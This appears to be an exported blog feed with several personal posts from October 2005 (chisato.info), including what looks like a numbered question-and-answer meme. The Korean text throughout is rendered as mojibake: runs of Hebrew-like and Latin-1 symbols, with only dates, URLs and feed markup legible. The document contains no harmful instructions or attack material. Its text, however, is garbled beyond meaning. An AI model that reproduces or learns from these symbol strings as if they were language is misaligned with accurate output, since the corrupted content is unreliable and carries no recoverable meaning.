    -Noname ´װְ÷ ²ֿ³× ±ה ´ה±ְ» ³²±ג¼ֱּצ¸¸, ְ¾מµµ ְת ÷־÷׀¿¡ ְײ¾מ¼­´ֲ ִ¡¸םְְ־ ¿ְ·ש°¡ ³»ְחµַ¾מְײ´. Noname ´װ²²´ֲ ֱֻ¼ַׁ ¸»ְֱּצ¸¸, ָ₪½ֳ ְּ ÷׀ְ÷ ¾ֱֶק ²ֿ ¾מ¸° ÷׀ְּ ¾ֶ´ׂ±מ? »חָ¸ֱײְַ¿ֽ ְְ¯ֱײְַ(¹׳ ±גֵ¸ °³³ה)ְַ ¹ְ°תֱ₪¿¡ ´כַׁ ְ±¸®±³°ת°תֱ₪(¿הֱעµµ ±׳·±ֱצ´ֲ ¸נ¸£°ֱצ¸¸, ¾מֲ·°ֵ³× ֳ¶ַ׀»ח´ֲ ְ±¸® ½ֳ°£¿¡ ¹ט¿ל´ֿ±מ)ְ» ְּ¼צֱַֿצ ¸רַׁ »ףְֲֵַ..
    -¿ה»חְּ ְ¥ְַ »ח¿כְ¿¬·ֹ´כ°¡ ´כֶר ³·¾ֱֶצ°ם ְײ´ֲ¹, ¾ֱֶקµµ ְ±¸®±³°ת°תֱ₪ְ» ְּ¼צֱַֿצ ¸רַֿ½ֵ ÷׀µיְ» ְ§ַֿ¿© ±ְ» ¾²±ג·־ ¸¶ְ½ ¸װְ÷ °ְּֽ´.
    -
    -
    -
    -
    -¼­·׀ְּ ±ז¾ת´.
    -
    -
    -
    -
    -
    -ְְ¯ֱײְַ¿ֽ »חָ¸ֱײְַ´ֲ ±׳ ¹ְ°תֱ₪ ְֳ¼°¡ ´¸£´.
    -½±°װ ַ®ְַּֿ¸י, ְְ´ֲ [±ֽ³³ְ ¹ְ°תֱ₪]ְ» °¡ֱצ°ם ְײ°ם, ְִָ´ֲ [¿¬¿×ְ]ְ¸·־ ¹ְַֿ°ם ְײ´.
    -
    -»ח¶קְ÷ ¾מ¶² ֱײְַ³× ֳ¶ַ׀ְּ ¾רְּµµ ֳז÷׀ָק ¸װ°ם »ל ¼צ ְײ´. ±׳·¸°װ ¿ְ·£ ¼¼¿שְ» »ל¾ֶ¿ְ¸י¼­, ¾מ¶² [µ¿ְֿ¼÷]°ת [¹÷¹¼÷]ְּ ֱ₪¸®µַ±ג ½ְֳַׁ´. ±׳¸®°ם ±׳°ְֽ÷ ַֿ³×ְַ ַ׀¹®ְ °טִֶ¸¦ ְּ·ח°װ µַ°ם, ¶ַַׁ ¹ְµַ¾מ°¡´ֲ °ְּֽ´.
    -ְְ¯ֱײְַ´ֲ ְּ·¸°װ ¹ְµַ¾מ¿װ´. ¼¼°ט µµֳ³ְַ »ףָ²ְ» ַֿ³×ַֿ³× ¼צֱ‎ַ״÷¸°ם, ÷ס½ֱַׁ ÷־÷׀ְ» ֳ·ֱ³½´. ±׳¸®°ם ÷¸ֶםְְ־ ֶ¯ֱתµיְ» ¹­¾מ¼­ ְּ·׀ָ­ ַׁ´.
    -
    -ְּ·¯ַׁ °תֱ₪ְ» °ִֵ¡´ֲ ֱ ¹°µַ´ֲ ֶ¯ֲ¡ְ÷ [¿­¸° »ח°ם]¶ף´ֲ ֱ¡ְּ´.
    -¿ר·׀ְְ־ ְְ¯ֱײְְַַ ְװְו¿¡¼­´ֲ ֱ¸ְחֱַֿצ ¾´ר ¸¹ְ÷ °³³הְּ, ֱצ±ְַ ְְ¯ֱײְַ, ½ְֳו°זֱ¦, ְ÷»ֱײְַ, ¹¹ ±גֵ¸ ְּ·±ְת·± (ַׁ±¹ְַ¥ַצְ¸·־ ְַֿ¸י) '¿לִֶ »חְּµו'¿¡ ¹טִ¡µַ¾מְײ´. ±׳ֱ ְֿ÷־´ֲ ½ֱֹצ¾מ [ְ±÷]ְ¸·־ ¸פ¾ֶ¼¼¿צֱצ´ר °ר»ךֱײְְַ, »חָ¸ֱײְְַµיְַ ְּ·׀¿¡¼­ ֲק¿כַׁ °ֽµיְּ±גµµ ַֿ´.
    -¶ַ ´¸¥ ֶ¯ֲ¡ְ÷ [¿ְָֿק ְִֿ¡ַֿ´ֲ ְּ·׀]ְּ ¾ײ´חֳ ֱ¸ְחַׂ ¼צ ¾ר´´ֲ °ְּֽ´.
    -
    -½¬¿מ ¿¹¸¦ ַֿ³× µי¾מ÷¸ְ.
    -
    -¸סְּ ±ז°ם »×»×ַׁ ±ךֵ׀·־ ¸צְּ µµ₪ַפְײְ¸¸ח ¹°ְ§¿¡ ¶°¼­ »‎ָ°ַֿ´ֲ ¿ְ¸® ÷ס½÷¹«·¹ַׁ ³¯ֱ½ְֲַ ְֿ÷־ ¹«¸®¸¦ ¿ל¸®´ֲ [¹יֱ¶]¶ף°ם ÷־¸£°ם ְײ´. ¾מֲ°¼­? ±׳ »ץ°¡ ָע »צְּ±ג ¶§¹®ְּ´. ְ¿¬¹‎ִ¢¿¡ ´כַֿ¿© ¿ל¸®´ֲ ´כ÷־÷׀ ְּ·¯ַׁ [±ֽ³³¹‎ְ »ח°םֳ¼°ט]¸¦ ±ג÷»ְ¸·־ ¿¬±¸¿¡ ְ׃ַׁ´.
    -±׳·±µ¥ ¾מ´ְ ¶§ְ־°¡, ¶ָ°°ְ÷ ֶ¯¼÷ְַ [°ְֻ÷ »ץ]°¡ ³×ֵ¸³­´. »‎¹°ַ׀ְ ÷׀·ש¹‎ְ¸·־ ֶַ´ַ״÷¸¸י ֶ²¸²¾רְּ ¹יֱ¶´. ±׳·±µ¥ °ְֻ÷ »צְּ´. ¾מֲ¾´?
    -
    -±׳·± °ְּֽ´. ±ֽ³³¹‎ְ »ח°םְַ ִ¡¸םְ ´ֱ¡ְּ±גµµ ַׁ ְּ ÷־÷׀, [ֱ׳´ֲ ³¯±מֱצ ֱר¸®°¡ ÷ׂ¾ַָֿ´]´ֲ °ֽ.
    -
    -ְ־°£ְּ µµְתָק ִֶ¾ַַׂ ¼צ ¾ר´ֲ ֱצ±¸»ף ¾מ´ְ ֱצֱ¡¿¡, ÷¸¶ש÷ ±מ¸¶±ֽ°¡ »ך´°ם °¡ֱ₪ַ״÷¸ְ. ְ־·ש´ֲ ¸ך¸ְֱַ ¼ר°£±מֱצ ±׳ ֱצֱ¡¿¡ ´´¸¦ ¼צ ¾ר´. ±׳·¸´¸י, ±מ¸¶±ֽ´ֲ °ְֻ÷ »צ, ְּ¶ף´ֲ ¸םֱ¦´ֲ ְֲ־°¡? ְ־°£ְּ ְ־ֱצֱַֿצ ¸רַֿ°ם ְײ´°ם ַ״¼­ ֱ¸ְחַֿ´ֲ ÷¸¶ש÷ ±מ¸¶±ֽ¸¦ ¹«½ֳַ״µµ ְֱֱ÷ °ֹ±מ?
    -
    -
    -±׳·¯³× [÷¸ֶםְ]ְ־ ¿¬±¸¸¦ ְ§ַֿ¿© ¿ל¸®´ֲ ±׳·± ÷־÷׀¿¡ ´כַֿ¿© ְ´חָק °ז°ט¸¦ ֱצ¾מ³ץ´ֲ´. ´¸¸ [»ח°ם]´ֲ ¿­·ְֱײ¾מ¾ ַׁ´. ¾נֱ¦ְ־°¡ ±׳ [÷¸¶ש÷ ±מ¸¶±ֽ]°¡ ¹°µַ´ֲ ³¯, [±מ¸¶±ֽ´ֲ ְ‎´כְְ¸·־ °ְֻ÷ »צְּ´] ¶ץ ֲֵµµ¸¦ °¡ֲק¾רְּ ¹צ¸± ¼צ ְײ´ֲ ַ׀¹®ְ ¼ׂ¾חְ» °®ֳ¾מ¾ ַׁ´´ֲ ְַ¹ּ´.
    -
    -
    -
    -
    -±׳·¯³× »חָ¸ֱײְַ´ֲ ½ְֳ÷־ֵֽ°¡ ´¸£´.
    -
    -÷ׂ¼¼ֳגְַ ֳ¶ַ׀ְ(ָ₪ְ÷ ¹ִּ¡±₪ְּ, ֳµְח ±גֵ¸ µמµמ) ¸¶¸£ֵ©½÷¿¡ ְַַֿ¿© ֱײֳ¢µָ ְּ ְּ·׀ְ÷, ±׳ ½ְְֳ÷ ÷ס·ֿ ¼­±¸¿¡ ֱַׁ₪µַ¾מְײ´´ֲ ÷סְֶַ» ¹°ם ְײֱצ¸¸ ¸¹ְ÷ ¹ְְ» °ֵµלַֿ¿© ַצְח¿¡ ְּ¸£·¶´.
    -ְ־°£ְַ ְּ¼÷ְ» ֳׁ µ¿¿רַֿ¿© ְ־·שְַ ָו¸§ְ» ÷׀¼®, ¿¹ֳרַֿ°ם ַֿ³×ְַ ְּ·׀ְ¸·־ ֱ₪¸³½ֳֵ² ְּ ְּ·׀ְ÷ ¾מ¶² ְַ¹ּ¿¡¼­ [¿¹¾נ¼­]·־ ÷¸¾ֶµµ ¹«¹זַׂ ֱצ°זְּ´. ±׳¸®°ם [¾נֱ¨°¡´ֲ ַ¿¬ְְ¸·־ ´ֳִ¿ֳ ´ְ½ °תֱ₪]ְ» ¼±ַאַֿ¿© ¼±ֱר±¹¿¡ ְּ¸£°ם ½ְֽ÷ ¿­¸ְֱ¸·־ ·¯½ֳ¾ֶ´ֲ ÷¼¼־÷סֵ° ַץ¸םְ» ´ַאַ´.
    -
    -
    -
    -»ח´ֲ ¸נ³ְֹ» ¹¶ף÷¸°ַ´כ.. ַֿ°ם ְּ·׀ְ» ¸¸µי¾מ ³×°¡´ֲ(ֱצ±µµ ±׳ °תֱ₪¿¡ ְײ´ֲ) ְְ¯ֱײְַ¿¡ ¹ַֿ¿©, »חָ¸ֱײְַ´ֲ ¸¶¸£ֵ©½÷ְַ ְּ·׀ְּ¶ף´ֲ ±ג÷»ְְ־ ֶ²ְ» ְֱ¦ַֿ¿© ¹ְַ״°£´. ´÷׀ָק ¿¬¿×¹‎ ְְּ´. ֵ« ֱײֱ¦°¡ ֱ₪ַ״ֱ®ְײ°ם, ±׳¿¡ ַױ´חַׁ ³ם°ֵµיְּ ÷¸ֲֵ¾מֱר´.
    -
    -
    -
    °³¶ְֻּ´ֲ ֱ׳¾ת´. ¸»¶ְֻּµµ ֱ׳¾ת´. ¼ׂ¶ְֻּµµ ֱ׳¾ת´.
    -°³¶ְֻּ ¸»¶ְֻּ ¼ׂ¶ְֻּ´ֲ ְ־°£ְּ´ץ¶ף.
    -ְ־°£ְ÷ ´ ֱ׳³×÷¸´.

    -
    -¶ף´ֲ ְ°³¿ֽ,
    -
    -
    -
    ְ־°£ְ÷ ´ ֱ׳´ֲ´.
    -°³¶ְֻּ´ֲ ְ־°£ְּ´. ¸»¶ְֻּµµ ְ־°£ְּ´. ¼ׂ¶ְֻּµµ ְ־°£ְּ´.
    -°³¶ְֻּ ¸»¶ְֻּ ¼ׂ¶ְֻּ´ֲ ´ ֱ׳´ֲ´.

    -
    -¶ף´ֲ ְ°³´ֲ ֲֵ»‎ְְ¸·־ °°ְ» ¼צ ¾ר´.
    -
    -
    -
    -
    -
    -´½ֳ ְ§·־ ¿ֳ¶ף°¡¼­.. Noname ´װְַ ´ה±ְ» ÷׀¼®ַ״÷¸ְ.
    -
    -
    -[´ח½ֵµיְ÷ ֱֲִֶµיְּ ³»¼¼¿ל´ֲ ¸¸ֵ­ְַ ³ם¸®¸¦ ¼¼¿ן ְ½ְֵּ ¾ר½ְ´ֿ´.]
    -
    -
    -±׳·¸ֱצ ¾´. ¿לִֶ´ֲ ֲֵ»‎ְּ ֱֲִֶ¿ֽ ´¸®, ³ם¸® ¸ױְת ¼¼¿ל°ם ±׳°ְֽ» ֵץְןַֿ¿© ½ֳַµַֿ´ֲ »ח¶קµיְַ ¸נְ׃ְּ ¾ֶ´ֿ´. ±׳µיְ÷ ±׳·± ְּ·׀ְּ³× ֵץְן°ת °ֵ¸®¸¦ µ־°ם ַצ½ְַ» ±׳ְת »ל¾ֶ³×°¥ »׃ְּ´. ¾מ´ְ ¼ר°£, ְ½ְֵַ »מ¿¡ ´כַׁ ÷¸ֶםֵ¸´חַׁ ¿רִ¢ְ» ´ְ³¢°װ µַ¾מ °¥ »׃..
    -
    -
    -
    -
    -
    -[±׳·¸±ג¿¡ ¿×»חְְ־ »ח°ַ ¸מ °¡ֱצ¸¦ ¿¹½ֳ·־ ´רֱ®³ץ°ם "÷ֱֳצ? ³» ¸»ְּ ¸ְֲ¾ֶ."¶ף°ם ¸»ַֿ°ם ½ֽ°ֱׂ.]
    -
    -
    -±׳·¸´. ±׳°װ ±ג÷»ְּ´.
    -¸¸¾א ¿©ֱצ²¯, ½ְֱֳ₪ְַ ´װ ¿¿¡µµ ´¸¥ '¿לִֶ'µיְַ ±ְ» ´ֱצ ±׳ ְְּ¯·־ [ָן. ÷¼ °¡ִ¡µµ ¾ר¾מ]ַֿ°ם ¹ּ·ןµ׳´¸י ±׳°ְֽ÷ ְ‎´כְְ¸·־ Noname ´װְַ ½ַ¼צְּ¸ח ְ¸רְּ´. ±׳µיְּ [¿רְֳ]ְ¸·־ ֳ±¸ַֿ°ם ְײ´ֲ °ְֽ÷ [±׳·²µםַׁ ְּ·׀°ת ¸ֱר ¹®ְו]ְּ ¾ֶ´ֿ¶ף »לְ» ÷־´כ¸ח »ל¾ֶ°¡´ֲ »מְַ ¹÷¹¼÷ְּ´. ±׳¸®°ם °¡´ַֹׁ [¹¸¥ ¹זַג]ְ¸·־ »מְּ ¹÷¹µַ±ג¸¦ ¹¶ף´ֲ ¹¶ק °°ְ÷ °ֵ¶צ±מ.
    -
    -
    -
    -
    -[´ח½ְֵּ ְֱּ¦²¯ ½ב¿ֲ ±µיְַ ¼­¼ת¹ז½ִµµ ֱ°נ ±׳·¡¿װ°ם, ְּ ½ֳ¸®ֱמ¿¡¼­µµ ±׳·¯±ג ְ§ַ״....]
    -
    -
    -¸ֲ´. ½ְֱֳ₪ְַ ´װְ÷ ¿©ֱצ²¯µµ ±׳·¡¿װ°ם ¾ױְ¸·־µµ ±׳·¸°װ ְ°³µַ´ֲ ±ְ» ½ב³»·ֱ °¥ °ְּֽ´. ±׳°ְּֽ ±׳ ÷׀ְַ »חְּµוside´. ¸¸ְֿ ±׳°ְֽ» ´ֱצ ±׳·¸´´ֲ ְְּ¯·־ ¸ֵµµַֿ°ם ½ְֽ÷ °ֵ¶ף¸י, ְ±¸® ±³°ת¼­¸¦ ¼קµ¶ַ״ֱײ½ֳ¶ף.
    -
    -
    -
    -
    -
    -
    -»ח¶קְּ »ל¾ֶ°¡´ֲ ¹ז¹‎¿¡´ֲ ¿©·¯°¡ֱצ°¡ ְײ´. ¹°·׀ ¾נֱ¨°¡ ְ־·ש°¡ ³¡ְו ³×´ֲ ³¯, ֱר¸®°¡ ³×ֵ¸³¯ ¼צµµ ְײְ» °ְּֽ´. ±׳·¯³× ±׳ »חְּ¿¡´ֲ ¾מֲ·°ֵ³× »ל¾ֶ¾ ֱַֿצ ¾°´ֲ°¡? ְ½ְֵּ ¼±ֳֵַׁ ±זְ», ְ½ְֵּ ¼±ֳֵַׁ ¹ז¹‎´כ·־..
    -
    -
    -
    -
    -
    -°¡¸¸ָק ְײְ¸¸י ֱ°£ְ÷ °£´. Noname ´װµµ °¡¸¸ָק °ט¼ּ´¸י ³×°°ְ÷ ¾ף¶±ג¿¡°װ ¾ְֶּµנ°¡ °ֵ·׀µַ¸ח ְּ·± ¾מְְֱ÷ ֶק½÷ֶ®¿¡ ְ־¿כµַ´ֲ °םֳ¸¦ °ֱצ´ֲ ¾ְ¸¼ְּ» °ְּֽ´. ±׳·¯³× ¾מֲ·°ֵ³× Noname ´װ ¿×½ֳ ְ½ְֵַ ¹ז¹‎ְ¸·־ »ל¾ֶ°¡°ם °ט½ֵ´. ±׳·± ֱ¡ְ÷ ֳז÷׀ָק ¸ֵ·ְְֲּ´. ¸נֲֹ·ֿ, Noname ´װְּ ¼±ֳֵַׁ [ֵץְןְ] »מ¿¡ ֱ¶±ְַ µµ¿עְּ µַ±ג¸¦ ¹¶ף¸ח (°°ְ÷ ±זְ» ֱֳֵַצ¸¸ ¸¶ֲש°¡ֱצְַ ½ַ¼צ¸¦ ¹ַֿ°ם ְײ´ֲ ÷׀µיְ» ְ§ַ״¼­µµ) ±ְ» ¸־ְ»±מ ַׁ´.
    -
    -
    -
    -+ µ¡.
    -ְּ µ־ ְּ·׀ְ» [±ֽ³³¹‎/¿¬¿×¹‎]¿¡ ÷סְ¯ַֿ´ֲ ¹ז¹‎ְ÷ ´÷׀ָק °³ְ־ְְ¸·־ »‎°¢ַ״³½ ¹ז¹‎ְֱּצ¸¸ ¾ףֳ ְ ¸ֲ´ֲ´°ם »‎°¢ַׁ´. ¹®ֱ¦°¡ ְײ´¸י ִ¸אֶ®·־.
    -
    -+ µ¡2.
    -ְ¼תֱַצ¸¸ ְְ¯ֱײְַ¶ף°ֵ³× »חָ¸ֱײְַ.. ±גֵ¸ 'ֱײְַ'°·ֳ °³³הְ÷ °£´ַֿ°ם ָ£¶פָ£¶פַׁ °ְּֽ ¾ֶ´ֿ´. ³×µµ ½ְַ÷ ¿ֿ÷®ָק ְ ¾ֻ°ם ְײ´ֲ °ְּֽ ¾ֶ´ֿ´. ±׳·¯³× ְֿ´ ±ְַ ֱרַאְ» ½±°װ ַֿ±ג ְ§ַ״¼­ ÷¸ֶםְְ¸·־ »ח¿כµַ´ֲ, ´כְְֱ־ [÷׀ְ§±ג]¸¦ ְג¾ֶ¼­ ֱרַאְַ½ְ» °ֵµל ¹אָש´.
    -
    -[¹÷¸ ¾ֶ´ֿ³ִ ֳ¥ ֱ» ְ׀°ם ¿ֽ¶ף] ½ְִַ ִ¸אֶ®´ֲ, ְְֿ¿¡µµ ¾´ ¹ ְײֱצ¸¸ »ח¾חַֿ°»ח¿ֹ´ֿ´.]]>
    -½־¿צ¶ף, ¼¼»ף°ת -ַֿ³כ¾ֶ -Tue, 11 Oct 2005 15:11:45 +0900 -
    - -÷ס°¡ ³¹« ¿ֲ´.. -http://chisato.info/blog/index.php?pl=665 - -
    -
    -
    -1.
    -÷ס°¡ ³¹« ¿ֲ´. ¾ִֶ§÷־ֵֽ ³»¸®³׳..
    -¾מ¸± ¶§´ֲ ֱֱ¾ֶַ´ר ±ג¾ןְּ ÷׀¸םֱַֿצ¸¸, ¾מֲ·µח ³×´ֲ ÷ס¸¦ ÷°·־ ֱֱ¾ֱֶַֿצ ¾´ֲ´.
    -
    -¸נµ־ ±׳·± °ְֽ÷ ¾ֶ´ֿ°ְ¸³×, ¾מֲ·µח ±׳ ³×ְּ°¡ ¸װµµ·ֿ [÷ס¿ְ´ֲ °ֵ ֱֱ¾ֶַֿ¼ְ~ ÷»ְ־ְ÷ ÷ס¿ְ´ֲ °ֵ ÷¸¸י °¨»ףְּ ¾מֲ¼±¸ְתֲ¼±¸ ַֿ¼ְ~ ¿ְ´ֳµµ ¾ִֶ§÷־ֵֽ ְְֳֳ ¾מֲ¼±¸~ ֳ¢°¡¿¡¼­ ¹«½¼ »‎°¢ְּ ¾מֲ¼±¸~]ַֿ´ֲ ¸»ְּ³× ³¯¸®°ם ְײ´ֲ ְּµיְ» ֱ¾ֱ¾ ÷»´.
    -´½ֳ ¸»ֱַֿצ¸¸ ÷ס¸¦ ֱֱ¾ֶַֿ´ֲ »ח¶קְּ ¸נµ־ ±׳·¸´´ֲ °װ ¾ֶ´ֿ´. ´¸¸ ´¸¥ ַאµ¿°ת ¿«¾מ¼­ »‎°¢ַ״÷¸¸י, ±׳ »ח¶קְַ ±׳ ´כ»ח´ֲ ½÷½÷·־ְַ ְּ¹ֱּצ¸¦ [¾ֱֶק ְ¯¾ֶ¼צֱ״ְַ ִ×¾ף°ֵ¸²ְּ³× ַֿ°ם ½ְֽ÷] ¼צֱ״¿¡ ¹­¾מ ³ץ´ֲ´. .... ¾מֲ¼¸י ±׳·± »ח¶קְ» ¿¬¼׃ְ¸·־ ¸מ¸מ ÷» ´צ÷׀¿¡ [¾ֶ.. ÷ס¿ְ´ֲ °ֵ ½ָ¾מ] ַֿ°װ µַ¾ת´ֱֲצµµ ¸נ¸£ֱצ¸¸.
    -
    -.... ְּ·± »‎°¢ַֿ°ם³×¸י ²ְ µµ¶ף ¿ְ´ֲ »‎°¢ְ÷.. [³×´ֲ ´©±÷°¡¿¡°װ ±׳·± »‎°¢ַֿµµ·ֿ ַׁ ְְּֿ ¾ר´ֲ°¡]ַֿ´ֲ ¹¼÷ֱ¶ְַ »ח°ם´.
    -.... ָ®½ֵַֿ´ֲµ¥(ְ¶ְּ³ִ), ֶ²¸²¾רְּ ³×µµ ±׳·± ֱ‏ ¸¹ְּ ְַ» °ֵ´(¿פְ½).
    -
    -
    -2.
    -³»°¡ ¼¼»ף¿¡¼­ ֱ¦ְֿ ½ָ¾מַֿ´ֲ ְְּֿ [µֵכ¼צ ¸ֲ´ֲ] ְְּֿ´. ±ג¿ױ ¸ֲ¾ֶ¾ ַׁ´¸י ְּ¸¶¸¦ °¥°´¿ְ.
    -
    -¿ְ·¡ »ל¾ׂ´°ם´ֲ ַׂ ¼צ ¾רֱצ¸¸ ¾מֲ·µח ²פְ²פְ »ל¾ֶ¿ֲ ¼¼¿ש, ³×µµ ±׳ ֱר¸® ¸¸ֵ­ְ÷ ¾ֻ°ם ְײ´. ¾ֶ¹«¸® ¿­½ָֹק ַ״µµ ¸נµ־¸¦ ¸¸ֱ·½ֳֵ³ ¼צ ¾ר°ם, ¾ֶ¹«¸® ³כ·ֲַ״µµ ¸נµ־¿¡°װ »ח¶¹ְ» ¼צ ¾ר°ם, ¾ֶ¹«¸® ¾ײ½בµµ ¸נµ־°¡ ¶ָ°°ְּ ÷¸¾ֱֶײֱצ´ֲ ¾´ֲ´´ֲ °ֽ.
    -±׳·¡¼­ ³×´ֲ ¹ּ¿ע¹´ֲ °ְֽ» µ־·ֱ¿צֱַֿצ´ֲ ¾´ֲ´. ֱ׳µµ·ֿ ³×¸¦ ¹ּ¿צַֿ´ֲ »ח¶קְּ ְײ´¸י, ¾מµע°¡¿¡ ±׳¸¸ֵ­ »ח¶ַ״ֱײ´ֲ »ח¶קµµ ְײ°ֱצ.
    -
    -
    -±׳·±µ¥ ¸»ְּ´, ¹ּ¿צַֿ´ֲ °ַ ְֱֱ÷µ¥, ²ְ, ¹µו½ֳ, µֵכ¼צ ִ¡´ֲ ְ־°£µיְּ ְײ´.
    -°ְׁ¸·־´ֲ ¿פ´ֲ ¾ף±¼ ַֿ°ם, ¹ּ¼ׂµµ ³¯·ֱֱײ°ם, ½ֱֹצ¾מ´ֲ ³» ֶםְ־ ¾ח, ³×¸¦ ְַּ״ַ״ֱײ´ֲ ¾ח ±¼´ר »ח¶קµי ֱ µֵכ¼צ ִ¡´ֲ ְ־°£µי.. ±׳·± ְ־°£µי÷¸´´ֲ ֲק¶ף¸® ¸יְ¿¡ ִ§ֶ¢±ג¸ח ½ײ¿וַֿ´ֲ ְּµיְּ ³´´.
    -¿ל¿¬ַׁ ·חֶ®·־ [´©±¸´©±¸°¡ ³×¿¡ ´כַֿ¿© ¹¹¶ף¹¹¶ף ¶°µי°ם ´´ׁ´]´ֲ ¼ׂ½ְִ» ֱ¢ַֿ´ֲ ±ג÷׀ְ÷ ֲ´דַֿ´. ¿וְ» ¸װ¾מ¼­? ¾ֶ´ֿ´. ¹ּ¿ע¹¾ֶ¼­? ¾ֶ´ֿ´. ±׳ ְ־°£¼÷ְּ ÷ׂ½ײַ״¼­.
    -ֲק¶ף¸® ³×¸¦ ÷ׂ·¯¼¼¿צ¶ף. ָ­°¡ ַ®¸®ֱצ ¾ְ¸¸י ¼­¿ן¿×ְ¿¡ ֳגµ־ַֿ¶ף°ם ֱֲצ¶ףµµ ³¯¸®½ֳ´ר°¡. ±׳ ¿¬ִָ ¸נµ־ ÷¸´ֲ µ¥¿¡¼­ ַׁ ´כ °ֵַֿ°װ ³¯¸®½ֳ´ר°¡. ³²µיַֿ°ם ¶ָ°°ְּ ¹הֳ¬°¸װְ¸¸ח »ח´ֲ ְ־°£ְּ, ±׳ ֱ₪µµ¹¿¡ ¸רµַ³×? µ¿¡¼­ ְֲ‎°ֵ¸± ֱ₪µµ? .... ¾מְּ±¸ ¹ה°×¾ֶ±מ¿צ¶ף.
    -
    -
    -
    -
    -
    -´ץ ¿פ±ג´ֲ °ַ ±׳·± ÷־·שµיְ÷ ֱצ°¡ µֵכ¼צ¸ְֲ¸¸י ¼¼»ףְּ µֱ‎¾מֱר ¾ח ¾´¹‎¼®ְ» ¶²´´ֲ »ח½ְַּ´. ¿ײ? ³¸¸ ַׂ ֱ ¾ֶ´ֲ ֱ‏ְ־°¡ ַ´ֲµ¥ ³²µיµµ ַֿ´ֿ±ס ¼ְ³×´ר?
    -³»°¡ ¾ֶ¹«¸» ¾°ם ³ׁ¾מ°£°ֵ, ³׳°¡ [¸פ·¡ ְֲ‎°ֵ¸®±ג] ¼÷°רַׁ ֵ¿ְּ ¾ֶ´ֿ¶ץ´. ±׳³ֹ ³»°¡ ¸נ¸£´ֲ ֳ´ ³ׁ¾מ°£°ֱֵצ..
    -
    -
    -»ל±ג°¡ ֱ¡ֱ¡ ֵֵֶֶַ״ֱצ´ֲ ¸נ¾חְּ´.
    -»ח¶קµי°ת ¼תְְּ³× ±ג¿ןְּ´ר ¶§°¡ ±׳¸³°ם³×. ¾נֱ¨°¡ְַ °טְ‎ְ÷, ¸¶ְ½ְּ ¸ֱֲצ ¾´ֲ ְ־°£µיַֿ°םµµ ¿פְ¸¸ח ¼תְְ» ±ג¿ןְֿ ¼צ ְײ¾ת´ץ·¨ֱצ. ³×´ֲ ±׳ ְ¸®°¡, ¾מ¿ן¸²ְַ ְ¸®ְ־ֱ·־ ¾ֻ¾ׂ´. .... °ם ְ¸®¼­ ¾ֶ±÷ְ±÷ ¸פ·¡ ³×´²µ¹¾ֶ°¬´ֱֲצ, ²ְּ³× ²ו°¾מ?
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -3.
    -¾ָ ַֿ´ר ֱ‏ ½ֵ³×°װ ַ´. .... ³²¿¡°װ ½ְָ÷ ¼ׂ¸® ַֿ´ֲ °ַ ֱֱ¾ֱֶַֿצ ¾ֱצ¸¸, ³×ְּ°¡ µו´ֿ±מ ²ְ²ְ ÷רְו ´¾ֶµ־´ר [¼­¿מַׁ ¸¶ְ½] °ק°£µµ ´¹°¸²ְּ ַד¼תַ״ֱצ´ֲ ¸נ¾חְּ´.
    -
    -"ְנ ¿ײ ְת·ֱ~?" ½ְֽ¸½ֵ ÷׀µי²² ´ה÷¯ְ»..
    -
    -
    "÷ס¿ְְ¿©~"

    -
    -
    -.... ¿פֳ£»ח ¾ָ ÷¸½ֳ³²? ³×´ֲ ¿ה»ץ [¸סֶק´ֲַ׳±¸´(¸סֶק÷׀µיְַ ַ׳ְַ·־ ִ³ ְּ¸§ְ» 'ֶ»‎ֶ»ח'´ר°¡·־ ¹²ו´´רµ¥)] ²ְֱצ ֱרֲ¥ ְח¹ְּײ°װ ÷¸°ם ְײ´. "¿צ~¸ֵ, ¹ֳִּ~÷׀°ֵ~ְּ~"]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Fri, 7 Oct 2005 10:12:17 +0900 -
    - -ַׁ ¹ר ´ץ ! ´¼¸ְ¹®´ה -http://chisato.info/blog/index.php?pl=663 -from : ¹®´ה - ´¼¸±ְ
    -
    -¿¹.. ְ¿¡ ַׁ¹ר ַ´ר °ֽ °°ֱצ¸¸, ¹¹ ±׳¶§¶ ֱצ±ְ÷ ´¸£´ֿ±מ ַׁ ¹ר ´ץ. :)
    -¿¹ְ¿¡ ַ´ר °ֹ ֱצ± ֳ£¾ֶ÷¸´ֿ ¹®ַ׳ְּ ¿ְָֿק(?) ´¸£±÷¿ה. ^^
    -
    -
    -
    -01. ְּ¸§ְּ¹¹¾?? ִ£ַֿ¸י¸»ַ״
    -02. ³×ְּ´ֲ¸מ»ל?? ¾ֻ¾ֶ¼­¹¹ַ״
    -03. »‎ְְֿ÷¾נֱ¦?? ¼±¹°ֱ°ֵ´ֿ
    -04. ְ½½ִ¹¹ֱֱ¾ֶ?? ¸»ַֿ¸י±ז¾מ
    -05. ¹¹¸¦¸ר¸װ¾מ?? ±¼ְֱּ©½ָ¾מ
    -06. ¿ְ÷¹¹ְװ´ֿ?? ³»¿ְװ°ֱצ
    -07. ֵ°´ֲ¸מ¼¾ִ¡?? ¾ֻ¾ֶ¼­¹¹ַ״
    -08. ³×ְֲּק±״÷¹?? ֱ₪µµ¿¡µ¶ף
    -09. ַ׀±³´ֲ¾מµנ?? ֱ¹¾קַ´´
    -10. ֲ¦»ח¶ַֿ´ֿ?? ¾ַָֿ°םְײ¾מ
    -
    -
    -11. ¾ײְ־´©±¸´ֿ?? ֱצ±ְ÷¾ר¾מ
    -12. ¼ׂ¼׃ְ÷ְײ¾מ?? ¹«½¼¼ׂ¸®³ִ
    -13. ֳכ¹ּ°¡¸נ¾?? ±½ךְ¸פ¶ף
    -14. ִ£±¸µי¸¹¾ֶ?? ¼ׂ¼צֱ₪¿¹ֱצ
    -15. »ן°ד»לֱֱ¾ֶ?? ±׳·°ְת·°ְ÷
    -16. ¿©±גְֱײ¿ֽ?? ¿©±ג°¡¾מµנ
    -17. °ר÷־´ְֲַ״?? ¾מ¸±¶©¾ֶ¸¶
    -18. ַג¼צ¹¹»ׁ·ֱ?? ¾ָ³×¼צְּ°ֽ
    -19. ½ֹ½ַֹװ¸נַ״?? ±׳°ֱֹס±גֱצ
    -20. ַ׀±³ְכְײ´ֿ?? ֱ¹¾קַ´±¸¡¡
    -
    -
    -21. ֶ¼÷סְֱײ÷ֱ?? °ְֵַ¾ָ÷¸ֱצ
    -22. ³מ¶©¾מµנ¼­?? ְַ¹ּ°¡¹¹¾
    -23. ֵ¬·´ְּ»ׁ´ֿ?? ְּ°ַ¹÷¼ׂ¸®
